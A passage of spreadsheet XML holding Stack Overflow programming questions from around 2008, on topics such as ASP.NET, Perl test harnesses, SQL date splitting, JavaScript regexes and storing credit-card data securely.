&lt;p&gt;I ask because I am calling a webservice (which accepts a string rather than a char) so I am doing a ToString on the property as I pass it over. I was expecting it to send an empty string if the char is not set.&lt;/p&gt;
&lt;p&gt;However this doesn't appear to be the case, so the question is what is the string?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I Update a GridView from a Page Method from code behind?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I update a Gridview on a aspx page from a webmethod?&lt;/p&gt;
&lt;p&gt;Here is my code.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[WebMethod]
public static string GetDate()
{
    return DateTime.Now.ToString();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can't use the "findcontrol" or the "this" methods so I need some help.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is this the best way to get unique version of filename w/ Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Still 'diving in' to Python, and want to make sure I'm not overlooking something. I wrote a script that extracts files from several zip files, and saves the extracted files together in one directory. To prevent duplicate filenames from being over-written, I wrote this little function - and I'm just wondering if there is a better way to do this?
Thanks!&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def unique_filename(file_name):
counter = 1
file_name_parts = os.path.splitext(file_name) # returns ('/path/file', '.ext')
while os.path.isfile(file_name): 
    file_name = file_name_parts[0] + '_' + str(counter) + file_name_parts[1]
    counter += 1
return file_name
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I really &lt;em&gt;do&lt;/em&gt; require the files to be in a single directory, and numbering duplicates is definitely acceptable in my case, so I'm not looking for a more robust method (tho' I suppose any pointers are welcome), but just to make sure that what this accomplishes is getting done the right way.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WCF Endpoint with Priority</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need WCF service with 3 endpoints &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;High&lt;/li&gt;
&lt;li&gt;Normal&lt;/li&gt;
&lt;li&gt;Low&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Most of messages will come through Normal and Low Endpoints. 
If Message on High will appear it have to be processed asap.&lt;/p&gt;
&lt;p&gt;Does anyone knows how to do it ???&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Forking subprocesses in Perl unit tests stops prove; Test::Harness exiting</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been trying to use the Perl utility/module "prove" as a test harness for some unit tests. The unit tests are a little more "system" than "unit" as I need to fork off some background processes as part of the test, Using the following...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sub SpinupMonitor{
   my $base_dir = shift;
   my $config = shift;
   my $pid = fork();
   if($pid){
      return $pid;
   }else{
      my $cmd = "$base_dir\/..\/bin\/monitor_real.pl -config $config -test";
      close STDOUT;
      exec ($cmd) or die "cannot exec test code [$cmd]\n";
   }
}
sub KillMonitor{
   my $pid = shift;
   print "Killing monitor [$pid]\n";
   kill(1,$pid);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However for some reason when I have my .t file spin up some extra processes it causes the test harness to hang at the end of the first .t file after all the tests have finished, rather than going on to the next file, or exiting if there is only one.&lt;/p&gt;
&lt;p&gt;At first I wondered if it might be because I was killing of my sub-processes and leaving them defunct. So I added..&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$SIG{CHLD} = \&amp;amp;REAPER;
sub REAPER {
   my $pid = wait;
   $SIG{CHLD} = \&amp;amp;REAPER;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;To the code. But that doesn't help. In fact on closed examination it turns out that my perl test file has exited and is now a defunct process and it is the prove wrapper script that has not reaped its child. In fact when I added a die() call at the end of my test script I got...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Looks like your test died just after 7.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So my script exited but for some reason the harness isn't unraveling.&lt;/p&gt;
&lt;p&gt;I did confirm that it is definitely my sub-processes that are upsetting it as when I disabled them while the tests failed the harness exited properly.&lt;/p&gt;
&lt;p&gt;Is there anything I am doing wrong with the way I am starting up my processes that might upset the harness in some way?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;Peter&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Organization of JUnit tests in projects</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What would you consider best practice for organizing JUnit tests in a project, and why? For example, do you keep your tests next to the classes they test? Do you put them in a separate but parallel package structure? Do you use a different organization strategy entirely?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to tell if a URL parameter needs to be encoded in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a Java app that is accepting URL parameter values that may or may not be encoded.  I need an easy way to tell whether or not I need to encode the parameter string.&lt;/p&gt;
&lt;p&gt;In other words, I want a function &lt;code&gt;boolean needsEncoding(String param)&lt;/code&gt;, which will return true if I pass in the String "foo@test.com", and false if I pass in "foo%40test.com".  The problem with this idea is that this is ambiguous.  How would I know whether or not the "%" sign in the latter string should be encoded?  One way to handle this is to modify my contract - require clients to pass in un-encoded strings so that I know I always need to encode them.  Thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Add ScriptManager to Page Programmatically?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am developing a WebPart (it will be used in a SharePoint environment, although it does not use the Object Model) that I want to expose AJAX functionality in.  Because of the nature of the environment, Adding the Script Manager directly to the page is not an option, and so must be added programmatically.  I have attempted to add the ScriptManager control to the page in my webpart code.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected override void CreateChildControls()
{
    if (ScriptManager.GetCurrent(Page) == null)
    {
        ScriptManager sMgr = new ScriptManager();
        // Ensure the ScriptManager is the first control.
        Page.Form.Controls.AddAt(0, sMgr); 
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, when this code is executed, I get the following error message:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;"The control collection cannot be modified during DataBind, Init, Load, PreRender or Unload phases."&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Is there another way to add the ScriptManager to the page from a WebPart, or am I going to have to just add the ScriptManager to each page (or master page) that will use the WebPart?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Eclipse PDT and .yml file, cannot open?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using Symphony framework and I have the default sandbox inside the Eclipse IDE. When I double click schema.yml instead of open in Eclipse it requests Windows to select a program to choose. I am a Visual Studio guy and I do not understand why it doesn't open in Eclipse, what should I do?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java Application Installers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm not looking for java-web-start, I'm looking for a thick-client application installation toolkit.  I've got a stand-alone application that consists of several files (jar files, data files, etc) and would need to do some pretty standard installation tasks, like asking the user for target directories, have them locate some parts of their system - choose some of the per-machine or per-user configuration options and possibly try to detect some of the machine settings for them.&lt;/p&gt;
&lt;p&gt;I'm looking for something which is like the MSI or other wizard driven installation applications.  What's a good installer for Java?  It would be ideal if it were cross-platform capable (Linux, Mac OSX and Windows).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get the most out of being a manual tester</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As a student, I have just got my first co-op job as a manual tester. I know it is as intellectual and demanding a job as a coder, but I cannot help thinking the other way around. I love being a coder but it is my first job. So I am asking you for any advice on how I can get the most out of the manual &lt;em&gt;black-box&lt;/em&gt; testing job, i.e how can I use it to improve my coding skills. Many thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Vista Window Focus Problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an application that manages patient demographic information. Along with this data a user can scan a picture of a patient and assign that picture to a patient. When the user clicks the scan button a separate application is opened as a dialog in order to scan the image. When running this on XP everything worked fine. The imaging application loaded up fine and gained focus. On Vista however occasionally the imaging application will not gain focus and will popup behind the main application. When running full screen or through 2008 Application Server you cannot see the application, you only get a locked screen and it appears nothing has happened. Is there any way to change the window focus management on Vista to work the way XP did? I'm looking for a way to solve this without making changes to the actual application if possible.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What do I need to do to upgrade an application to the latest Rails version?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently using Rails 2.1.0 and want to upgrade to Rails 2.1.1. After issuing the following command &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;gem update rails
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I suppose that I need to change this line &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;RAILS_GEM_VERSION = '2.1.0' unless defined? RAILS_GEM_VERSION
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in environment.rb&lt;/p&gt;
&lt;p&gt;What other actions should I take to ensure that my application is using the latest version? Are there some other files that need an update?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to monitor MySQL space?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I downloaded a VM image of a web application that uses MySQL.&lt;/p&gt;
&lt;p&gt;How can I monitor its space consumption and know when additional space must be added?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET: How to convert &lt;A&gt; or HtmlAnchor to static text?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i have a repeater that will output a series of items:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;asp:repeater ... runat="Server"&amp;gt;
   &amp;lt;itemtemplate&amp;gt;
      &amp;lt;a href="&amp;lt;%# GetItemLink(...) %&amp;gt;"&amp;gt;&amp;lt;%# GetItemText %&amp;gt;&amp;lt;/a&amp;gt;
   &amp;lt;itemtemplate&amp;gt;
&amp;lt;asp:repeater&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But some items will not have an associated link, so i don't want them to be clickable. i tried making it a &lt;code&gt;runat=server&lt;/code&gt; &lt;code&gt;HtmlAnchor&lt;/code&gt;, and set the &lt;code&gt;htmlAnchor.Disabled = true&lt;/code&gt; for the items are should not actually have a link - but they can still be clicked (it just makes the text gray)&lt;/p&gt;
&lt;p&gt;i know how i'd do it in the olden days:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;% If IsLink Then %&amp;gt;
   &amp;lt;A href="&amp;lt;% =GetItemLink%"&amp;gt;
&amp;lt;% End If %&amp;gt;
   &amp;lt;% =GetItemText %&amp;gt;
&amp;lt;% If IsLink Then %&amp;gt;
   &amp;lt;/A&amp;gt;
&amp;lt;% End If %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But that's the messy mixing code and html ASP way. What's the ASP.NET way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a Perl-compatible regular expression to trim whitespace from both sides of a string?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to do this in one line?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$x =~ s/^\s+//;
$x =~ s/\s+$//;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In other words, remove all leading and trailing whitespace from a string.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Has and belongs to many relationship with multiple databases</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a situation where I have two models, companies and permissions, where companies is in a separate database from my permissions database.  This is a has and belongs to many relationship because each company can have many permissions and each permission can belong to many companies.&lt;/p&gt;
&lt;p&gt;The reason the two databases are split is because the company database runs a high demand production application and the permissions database controls the permissions for another application.&lt;/p&gt;
&lt;p&gt;With rails, it looks for the join table in the same database as the primary table.  For instance, if I do company.permissions, it looks in the company database for company_permissions.  If I do permission.companies it looks in the permissions database.&lt;/p&gt;
&lt;p&gt;What is the best solution to using a has and belongs to many relationship with multiple databases?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the difference between a deep copy and a shallow copy?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the difference between a deep copy and a shallow copy?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET session and storing objects that use COM interop</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on an asp.net web site.  We have to use com interop to interact with legacy vb6 activex components.  The components in many cases rely on receiving a context object (which is itself a vb6 activex component) as a parameter.  The context object is fairly costly to construct.&lt;/p&gt;
&lt;p&gt;Therefore one idea is that a context object is constructed once and stored in asp.net session.  However, if this object is just a .net wrapper around an activex component, is it wise or advisible to persist such an object in session?&lt;/p&gt;
&lt;p&gt;Additionally the context object contains user specific information, so persisting using .net HttpRuntime Caching could be used, but would require a user specific key.  &lt;/p&gt;
&lt;p&gt;I understand the other limitations and things you need to be aware of with asp.net session, &lt;a href="http://stackoverflow.com/questions/133236/aspnet-session"&gt;aspnet-session question&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;To ask the question a slightly different way: are their any issues or problems with storing an .net object that is just a wrapper around a com object?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get an error-code from a VB component into (serverside) JScript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an plain-old asp web site that makes a call to a method in a dll written in VB 6. This method sets an error code in the VB Err Object if something goes wrong. Now I want to access that error code and description set in the Err object from a javascript (where I do the call to the dll method). First: is it possible? Second: if it is possible, how can I do that? Thanks in advance!&lt;/p&gt;
&lt;p&gt;My first idea was:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Function MyFunc()
{
  var obj = Server.CreateObject(â€œMyDll.MyClassâ€);
  try
  {
    obj.MyMethod();
  }
  catch(error)
  {
    // Here I want to get the error code and description from the VB Err object
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;However, when I try this, the error I get is wrong. (I tried to make a test-app which receives the same error.)  I get an error-code which isn't the same in JavaScript as in VB.&lt;/p&gt;
&lt;p&gt;Anyone know how this aught to be done?&lt;/p&gt;
&lt;p&gt;/L&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which Facebook .NET Library is the best to use?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There is a list of projects &lt;a href="http://www.marketing-ninja.com/old-stuff/list-of-facebook-sdks-for-net/"&gt;here&lt;/a&gt;, mainly the &lt;a href="http://www.codeplex.com/FacebookToolkit"&gt;Facebook Developer Toolkit&lt;/a&gt; and &lt;a href="http://www.nikhilk.net/FacebookNET.aspx"&gt;Facebook.NET&lt;/a&gt;. However, I've seen a lot of negative feedback about the toolkit and it seems like Facebook.NET hasn't been upgraded to the latest facebook API. &lt;/p&gt;
&lt;p&gt;Are either of these worth using? Any other good libraries out there?&lt;/p&gt;
&lt;p&gt;Specifically I'm looking to use the library in a ASP.NET MVC application.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Recommended spec for a build server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're using CruiseControl.NET to manage our builds and we're in the process of obtaining a new build server. I've been tasked with coming up with the spec for the new server.&lt;/p&gt;
&lt;p&gt;This server will need to run multiple builds concurrently and as effeciently as possible.&lt;/p&gt;
&lt;p&gt;What would you consider the ideal spec for this server?&lt;/p&gt;
&lt;p&gt;Any links to existing articles / blogs dealing with this topic will also be welcome!&lt;/p&gt;
&lt;p&gt;Edit: Will RAID be helpful at all? (Bonus points)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Error with C# Partial classes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using partial classes to split some functionality between 2 files, but I am getting an error.  What am I doing wrong?&lt;/p&gt;
&lt;p&gt;A1.cs:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private partial class A
{
    private string SomeProperty { get { return "SomeGeneratedString"; } }       
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;A2.cs:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private partial class A
{
    void SomeFunction()
    {
        //trying to access this.SomeProperty produces the following compiler error, at least with C# 2.0
        //error CS0117: 'A' does not contain a definition for 'SomeProperty'
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C++ testing framework: recommendation sought</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a "quick and dirty" C++ testing framework I can use on my Windows/Visual Studio box. It's just me developing, so it doesn't have to be enterprise class software. 
Staring at a list of testing frameworks, I am somewhat befuddled...&lt;/p&gt;
&lt;p&gt;&lt;a href="http://en.wikipedia.org/wiki/List_of_unit_testing_frameworks#C.2B.2B" rel="nofollow"&gt;http://en.wikipedia.org/wiki/List_of_unit_testing_frameworks#C.2B.2B&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the general complexity of building a canonical language representation?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It is often handy to have a canonical representation of a language (in my case they are usually domain specific languages); however, I believe there are strict limits on the expressiveness of the languages involved that determine whether a canonical form can be determined and/or created for an arbitrary program in that language.  Unfortunately, I've been unable to find the references that I (vaguely) recall reading about this in.&lt;/p&gt;
&lt;p&gt;On one hand, it seems reasonable that creating a canonical representation of a language is of comparable complexity to many hard graph problems (eg: graph isomorphism), but on the other hand, iirc, compilers like gcc, yhc, and ghc use intermediate representations to generate outputs in various formats (assembly, javascript, etc.), so this is at least in some forms, a solved problem.  &lt;/p&gt;
&lt;p&gt;When is it possible to determine / generate a canonical form for a given language? (How expressive can that language be, and how does language expressiveness impact the utility of the canonical forms?)  Please provide references or proofs if at all possible.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Edit:&lt;/em&gt; For example, a &lt;a href="http://en.wikipedia.org/wiki/Regular_language" rel="nofollow"&gt;Regular Language&lt;/a&gt; (eg: the 'pure' form of regular expressions) can not express many of the same things that a &lt;a href="http://en.wikipedia.org/wiki/Turing_complete" rel="nofollow"&gt;Turing-complete language&lt;/a&gt; can.  In other words, you can't write a web server in a regular language, but you can with lambda calculus).  My question is about the theoretical possibilities, and does have a specific answer relating to complexity theory.  If I have a DSL that needs to be transmitted to another system, it will often be beneficial to generate a canonical form of that code before transmitting it, since that will decouple the independent representations used by the two different systems.  &lt;em&gt;However&lt;/em&gt;, if it is P-Space complete, or NP-Complete to translate a Turing-complete language into a canonical form, then you shouldn't waste time trying to build a canonical form -- either find another way to do it, or reduce the language complexity to something that &lt;em&gt;can&lt;/em&gt; be canonicalized in polynomial time.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Date Range Split</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can you please let me know the SQL to split date ranges when they overlap?&lt;/p&gt;
&lt;p&gt;Data (sample data with a date range and possibly other columns):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    Col1 FromDate ToDate
 1. 1    1/1/2008 31/12/2010
 2. 1    1/1/2009 31/12/2012
 3. 1    1/1/2009 31/12/2014
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   Col1  From Date ToDate
1. 1     1/1/2008 31/12/2008 (from row 1 above)
2. 1     1/1/2009 31/12/2010 (from rows 1,2 and 3 above)
3. 1     1/1/2011 31/12/2012 (from rows 2 and 3 above)
4. 1     1/1/2013 31/12/2014 (from row 3 above)
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Navigation on validation failure in Seam/JSF</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been playing with &lt;a href="http://www.seamframework.org/" rel="nofollow"&gt;Seam&lt;/a&gt; (2.0.2.SP1) for a few weeks, and I have most of the basics nailed down, but I haven't come up with a decent solution to the following.&lt;/p&gt;
&lt;p&gt;Suppose I have a form at &lt;code&gt;/foo.xhtml&lt;/code&gt;, with a rewrite rule such that URLs like &lt;code&gt;/foo.seam?id=&amp;lt;fooId&amp;gt;&lt;/code&gt; are converted to &lt;code&gt;/foo/&amp;lt;fooId&amp;gt;&lt;/code&gt;.  There's a &lt;code&gt;commandButton&lt;/code&gt; on the form with an action of &lt;code&gt;#{fooHome.update}&lt;/code&gt;.  I also have a navigation rule in &lt;code&gt;/foo.page.xml&lt;/code&gt; that redirects back to a nice, bookmark-friendly GET after a successful POST:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;navigation from-action="#{fooHome.update}"&amp;gt;
    &amp;lt;rule if-outcome="updated"&amp;gt;
        &amp;lt;redirect view-id="/foo.xhtml"&amp;gt;
            &amp;lt;param name="id" value="#{fooHome.instance.id}"/&amp;gt;
        &amp;lt;/redirect&amp;gt;
    &amp;lt;/rule&amp;gt;
&amp;lt;/navigation&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is when a validation error occurs, at which point the navigation rules get skipped, and I end up at &lt;code&gt;/foo&lt;/code&gt; after the POST.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;My question:  Is there a way to redirect on validation errors, so I end up with a GET request for &lt;code&gt;/foo/&amp;lt;fooId&amp;gt;&lt;/code&gt; instead of the POST to &lt;code&gt;/foo&lt;/code&gt;?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I tried rolling my own validation methods in &lt;code&gt;fooHome&lt;/code&gt;, returning a "failed" outcome, but I don't really want invalid data getting past the validation phase (and thus into the current conversation).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CSS and lack of constants/variables issue?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given a stylesheet with a fully qualified reference to an image resource on another server, is there a good way to handle promotions through different environments that require a different base URL?&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;background-image: url
  (evironmentSpecificURL/resourceName.foo);&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The environmentSpecificURL will vary from environment to environment and I don't want this file to be modified as it progresses from development, qa, staging, production, etc.&lt;/p&gt;
&lt;p&gt;I have ideas, but am interested in how others have dealt with this -- I'll post one of my ideas.&lt;/p&gt;
&lt;p&gt;Let me underscore (based on another response) that the image resource does not exist on the same server and that is the URL that will change. So relative paths do not work in that situation.&lt;/p&gt;
&lt;p&gt;Also, I am trying to avoid the need to modify the css where there could be multiple instances of the URL and centralize that URL to one point of configuration.&lt;/p&gt;
&lt;p&gt;any help!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are some best practices for handling sensitive information?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently creating an application for a customer that will allow them to automatically bill their customers credit cards.  &lt;/p&gt;
&lt;p&gt;I'm curious as to what are some &lt;strong&gt;best practices&lt;/strong&gt; to safely store and access the credit card information, and for that matter, any other sensitive information, like social security numbers, account numbers and so on.&lt;/p&gt;
&lt;p&gt;I'm &lt;strong&gt;assuming&lt;/strong&gt; encryption of some type will be employed, but before I dig in too deep I wanted to see how others are handling these types of requirements.&lt;/p&gt;
&lt;p&gt;Not that it matters, but we are designing the software using Microsoft SQL Server for the database, and using C# and ASP.NET.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Uninitialized string offset error from PHP import script</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an import-from-excel script as part of a CMS that previously ran without issue.&lt;/p&gt;
&lt;p&gt;My shared-hosting provider has recently upgraded their infrastructure, including PHP from 5.1 to 5.2.6, and the script now returns "Uninitialized string offset: -XXX in /path/scriptname.php on line 27" (XXX being a decreasing number from 512 and /path/scriptname.php of course being the full path to script in question). &lt;/p&gt;
&lt;p&gt;It returns this error for every line of the excel file. Line 27 is just a return from within a function that is the first point at which the imported data is being processed:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function GetInt4d($data, $pos) {
        return ord($data[$pos]) | (ord($data[$pos+1]) &amp;lt;&amp;lt; 8) | (ord($data[$pos+2]) &amp;lt;&amp;lt; 16) | (ord($data[$pos+3]) &amp;lt;&amp;lt; 24); 
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It finally implodes with a "Fatal error: Allowed memory size of 47185920 bytes exhausted (tried to allocate 71 bytes) in /path/scriptname.php on line 133".&lt;/p&gt;
&lt;p&gt;There's nothing useful in Apache error logs. I am stumped. Anyone have any ideas of at least where to look? Even knowing if it's likely to be something within my script or something to do with upgrade would be useful. I had another issue with a different site on same provider that (after upgrade) couldn't write sessions to tmp directory (since resolved), but am pretty sure it's not that (?).&lt;/p&gt;
&lt;p&gt;EDIT: As it turned out that the answer was to do with the version of the parser being incompatible in some way with PHP 5.2.6, I thought it might be of use to someone that the parser in question is &lt;a href="http://sourceforge.net/project/showfiles.php?group_id=99160&amp;amp;package_id=106368" rel="nofollow"&gt;Spreadsheet Excel Reader&lt;/a&gt; .&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Issues with client consuming a .net web service upgraded from .NET 1.1 to 3.5</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a web application that was recently converted from Visual Studio 2003 to Visual Studio 2008.  The application contained some web services that were written using the .NET 1.1 Framework and Web Service Enhancements 2.0.  They were converted to the .NET 3.5 framework using the VS 2008 Conversion Wizard Tool.&lt;/p&gt;
&lt;p&gt;A client application which is still written using the .NET 1.1 framework has a reference to the updated web service and try to consume the web service and received the following error:&lt;/p&gt;
&lt;p&gt;System.Web.Services.Protocols.SoapException: Server did not recognize the value of HTTP Header SOAPAction: (web service URI)&lt;/p&gt;
&lt;p&gt;The URL Behavior is set to static for the reference and the proxy class inheritance was changed from System.Web.Services.Protocols.SoapHttpClientProtocol namespace to Microsoft.Web.Services2.WebServicesExtension namespace&lt;/p&gt;
&lt;p&gt;If you need additional information or need to see some source code, please let me know.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I concatenate regex literals in JavaScript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to do something like this?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var pattern = /some regex segment/ + /* comment here */
    /another segment/;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Or do I have to use new &lt;code&gt;RegExp()&lt;/code&gt; syntax and concatenate a string? I'd prefer to use the literal as the code is both more self-evident and concise.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Convert Month Number to Month Name Function in SQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have months stored in SQL Server as 1,2,3,4,...12. I would like to display them as January,February etc. Is there a function in SQL Server like MonthName(1) = January? I am trying to avoid a CASE statement, if possible.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Javascript nested class</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I define nested class in Java Script. &lt;/p&gt;
&lt;p&gt;Here is the code snippet I have:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;objA = new TestA();
function TestB ()
{
   this.testPrint = function ()
  {
     print ( " Inside testPrint " );
  }
}
function TestA ()
{
   var myObjB = new TestB();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I am trying to access testPrint using objA&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;objA.myObjB.testPrint();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But its giving error "objA has no properties"&lt;/p&gt;
&lt;p&gt;How can I access testB method using objA handler?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to inflate a file with zlib.NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using the &lt;a href="http://www.componentace.com/zlib_.NET.htm" rel="nofollow"&gt;zlib.NET&lt;/a&gt; library to try and inflate files that are compressed by zlib (on a Linux box, perhaps).  Here's what I'm doing:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;zlib.ZInputStream zinput =
    new zlib.ZInputStream(File.Open(path, FileMode.Open, FileAccess.Read));
while (stopByte != (data = zinput.ReadByte()))
{
  // check data here
}
zinput.Close();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The data bytes match the compressed data bytes, so I must be doing something wrong.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Would you architect the control API of the next-gen Mars rover to be RESTful instead of an RPC?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Forgive me if this verges on being a "discussion" question, but I really would 
appreciate a yes/no answer, with an appropriate explanation.  &lt;/p&gt;
&lt;p&gt;Suppose you have to design and implement a control API for a robot, say the next 
generation Mars Rover.  Do you architect this API according to RESTful 
principles, or do you use a classic RPC, such as XMLRPC?  &lt;/p&gt;
&lt;p&gt;I ask this because I have to do something similar, though the "robot" is a collection of virtual machines.  I'm being urged by one rather persuasive engineer, a well known REST advocate, to make the API RESTful.  I've never used REST principles, and I'm struggling to see how they fit in designing low-level inter-process APIs. REST seems infused with the theme of interacting with a modifiable data repository, usually many hops away. What I'm trying to do feels more like closely controlling a robot.  I can see how one could argue that the robot is, in the abstract, just a data repository -- "PUT left turn", "PUT travel 100 meters", "GET outside temperature".  But this seems to be a rather contrived model.  I certainly will receive no benefit from caching or a proxy ("Hello, JPL?  This is the Akamai co-lo in Canberra.  We're taking over the Rover now, ok?") &lt;/p&gt;
&lt;p&gt;So, is a RESTful architecture useful here?  Is it still superior to RPC even 
when the interaction is so narrowly focused?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Modifying NSDate to represent 1 month from today</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm adding repeating events to a Cocoa app I'm working on. I have repeat every day and week fine because I can define these mathematically (3600*24*7 = 1 week). I use the following code to modify the date:&lt;/p&gt;
